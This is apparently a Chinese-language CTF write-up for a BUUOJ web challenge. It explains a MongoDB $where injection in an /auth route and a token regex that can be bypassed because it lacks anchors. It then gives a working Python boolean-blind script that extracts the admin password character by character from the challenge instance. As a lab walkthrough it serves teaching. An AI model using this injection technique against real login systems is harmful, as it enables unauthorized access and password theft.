一开始进入页面有点迷茫,查看了一遍也没什么发现。
查看给出的源码,在schema.js可以知道用的是mongodb。
之前也没有见过mongodb,简单了解一下
MongoDB是一个基于分布式文件存储 [1] 的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。
在index.ts中发现存在SQL注入
router.post('/auth', async (req, res) => {
let { token } = req.body;
if (token !== '' && typeof (token) === 'string') {
if (checkmd5Regex(token)) {
try {
let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()
通过上面的代码我们可以看到它调用了一个checkmd5Regex,跟踪到utils.js文件中可以发现这里存在一个checkmd5Regex的waf
const checkmd5Regex = (token: string) => {
return /([a-f\d]{32}|[A-F\d]{32})/.exec(token);
}没有加上^$,所以可以绕过
接下来就是SQL注入出密码了,使用布尔注入:
import requests
import string
url="http://0b48abc1-6069-445b-a187-54a0edbc8c7a.node4.buuoj.cn:81/auth"
headers={
"Cookie": "session=s:43UCQxzqHneiwEF-JP_ftZ0Aw1upXuCF.t58XyJ4BQ4rmP8Da+VdQzkHtAd1r4EkRUs9h/Zim3os",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Referer": "http://0b48abc1-6069-445b-a187-54a0edbc8c7a.node4.buuoj.cn:81/packages/submit",
"Origin": "http://0b48abc1-6069-445b-a187-54a0edbc8c7a.node4.buuoj.cn:81",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Upgrade-Insecure-Requests": "1",
}
flag = ''
for i in range(10000):
for j in string.printable:
if j == '"':
continue
payload='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[{}]=="{}'.format(i,j)
#print(payload)
data={
"_csrf":"2PzwJX5n-Y1qH02TLkz3_JXa_OBn2hpgU2G8",
"token":payload
}
r=requests.post(url=url,data=data,headers=headers,allow_redirects=False)
#print(r.text)
if "Found. Redirecting to" in r.text:
#print(payload)
flag+=j
print(flag)
break
"!@#&@&@efefef*@((@))grgregret3r"
"!@#&@&@efefef*@((@))grgregret3r"
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
